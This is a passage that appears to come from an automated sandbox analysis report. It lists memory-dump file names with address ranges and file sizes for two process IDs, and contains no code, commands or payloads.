                                                                      • memory/2132-72-0x00007FF940320000-0x00007FF940853000-memory.dmp

                                                                        Filesize

                                                                        5.2MB

                                                                      • memory/2132-109-0x00007FF940930000-0x00007FF940AAF000-memory.dmp

                                                                        Filesize

                                                                        1.5MB

                                                                      • memory/2132-66-0x00007FF94F750000-0x00007FF94F783000-memory.dmp

                                                                        Filesize

                                                                        204KB

                                                                      • memory/2132-326-0x00007FF94F730000-0x00007FF94F744000-memory.dmp

                                                                        Filesize

                                                                        80KB

                                                                      • memory/2132-64-0x00007FF955AE0000-0x00007FF955AED000-memory.dmp

                                                                        Filesize

                                                                        52KB

                                                                      • memory/2132-254-0x00007FF94F750000-0x00007FF94F783000-memory.dmp

                                                                        Filesize

                                                                        204KB

                                                                      • memory/2132-74-0x00007FF954BC0000-0x00007FF954BE7000-memory.dmp

                                                                        Filesize

                                                                        156KB

                                                                      • memory/2132-73-0x000002C474040000-0x000002C474573000-memory.dmp

                                                                        Filesize

                                                                        5.2MB

                                                                      • memory/2132-258-0x00007FF940860000-0x00007FF94092E000-memory.dmp

                                                                        Filesize

                                                                        824KB

                                                                      • memory/2132-259-0x00007FF940320000-0x00007FF940853000-memory.dmp

                                                                        Filesize

                                                                        5.2MB

                                                                      • memory/2132-62-0x00007FF94F820000-0x00007FF94F839000-memory.dmp

                                                                        Filesize

                                                                        100KB

                                                                      • memory/2132-264-0x000002C474040000-0x000002C474573000-memory.dmp

                                                                        Filesize

                                                                        5.2MB

                                                                      • memory/2132-60-0x00007FF940930000-0x00007FF940AAF000-memory.dmp

                                                                        Filesize

                                                                        1.5MB

                                                                      • memory/2132-82-0x00007FF941120000-0x00007FF9411D3000-memory.dmp

                                                                        Filesize

                                                                        716KB

                                                                      • memory/2132-56-0x00007FF954B10000-0x00007FF954B29000-memory.dmp

                                                                        Filesize

                                                                        100KB

                                                                      • memory/2132-54-0x00007FF94F870000-0x00007FF94F89B000-memory.dmp

                                                                        Filesize

                                                                        172KB

                                                                      • memory/2132-48-0x00007FF955AF0000-0x00007FF955AFF000-memory.dmp

                                                                        Filesize

                                                                        60KB

                                                                      • memory/2132-30-0x00007FF954BC0000-0x00007FF954BE7000-memory.dmp

                                                                        Filesize

                                                                        156KB

                                                                      • memory/2132-25-0x00007FF940AB0000-0x00007FF941115000-memory.dmp

                                                                        Filesize

                                                                        6.4MB

                                                                      • memory/2132-94-0x00007FF94F840000-0x00007FF94F865000-memory.dmp

                                                                        Filesize

                                                                        148KB

                                                                      • memory/2132-79-0x00007FF953B50000-0x00007FF953B5D000-memory.dmp

                                                                        Filesize

                                                                        52KB

                                                                      • memory/2132-71-0x00007FF940860000-0x00007FF94092E000-memory.dmp

                                                                        Filesize

                                                                        824KB

                                                                      • memory/2132-76-0x00007FF94F730000-0x00007FF94F744000-memory.dmp

                                                                        Filesize

                                                                        80KB

                                                                      • memory/2132-78-0x00007FF94F870000-0x00007FF94F89B000-memory.dmp

                                                                        Filesize

                                                                        172KB

                                                                      • memory/2132-81-0x00007FF954B10000-0x00007FF954B29000-memory.dmp

                                                                        Filesize

                                                                        100KB

                                                                      • memory/2132-279-0x00007FF940AB0000-0x00007FF941115000-memory.dmp

                                                                        Filesize

                                                                        6.4MB

                                                                      • memory/2132-293-0x00007FF941120000-0x00007FF9411D3000-memory.dmp

                                                                        Filesize

                                                                        716KB

                                                                      • memory/2132-285-0x00007FF940930000-0x00007FF940AAF000-memory.dmp

                                                                        Filesize

                                                                        1.5MB

                                                                      • memory/2132-314-0x00007FF940AB0000-0x00007FF941115000-memory.dmp

                                                                        Filesize

                                                                        6.4MB

                                                                      • memory/2132-328-0x00007FF941120000-0x00007FF9411D3000-memory.dmp

                                                                        Filesize

                                                                        716KB

                                                                      • memory/2132-339-0x00007FF940320000-0x00007FF940853000-memory.dmp

                                                                        Filesize

                                                                        5.2MB

                                                                      • memory/2132-338-0x00007FF940860000-0x00007FF94092E000-memory.dmp

                                                                        Filesize

                                                                        824KB

                                                                      • memory/2132-337-0x00007FF94F750000-0x00007FF94F783000-memory.dmp

                                                                        Filesize

                                                                        204KB

                                                                      • memory/2132-336-0x00007FF955AE0000-0x00007FF955AED000-memory.dmp

                                                                        Filesize

                                                                        52KB

                                                                      • memory/2132-335-0x00007FF94F820000-0x00007FF94F839000-memory.dmp

                                                                        Filesize

                                                                        100KB

                                                                      • memory/2132-334-0x00007FF940930000-0x00007FF940AAF000-memory.dmp

                                                                        Filesize

                                                                        1.5MB

                                                                      • memory/2132-333-0x00007FF94F840000-0x00007FF94F865000-memory.dmp

                                                                        Filesize

                                                                        148KB

                                                                      • memory/2132-332-0x00007FF954B10000-0x00007FF954B29000-memory.dmp

                                                                        Filesize

                                                                        100KB

                                                                      • memory/2132-331-0x00007FF94F870000-0x00007FF94F89B000-memory.dmp

                                                                        Filesize

                                                                        172KB

                                                                      • memory/2132-330-0x00007FF955AF0000-0x00007FF955AFF000-memory.dmp

                                                                        Filesize

                                                                        60KB

                                                                      • memory/2132-329-0x00007FF954BC0000-0x00007FF954BE7000-memory.dmp

                                                                        Filesize

                                                                        156KB

                                                                      • memory/2132-327-0x00007FF953B50000-0x00007FF953B5D000-memory.dmp

                                                                        Filesize

                                                                        52KB

                                                                      • memory/3484-243-0x000001846F250000-0x000001846F298000-memory.dmp

                                                                        Filesize

                                                                        288KB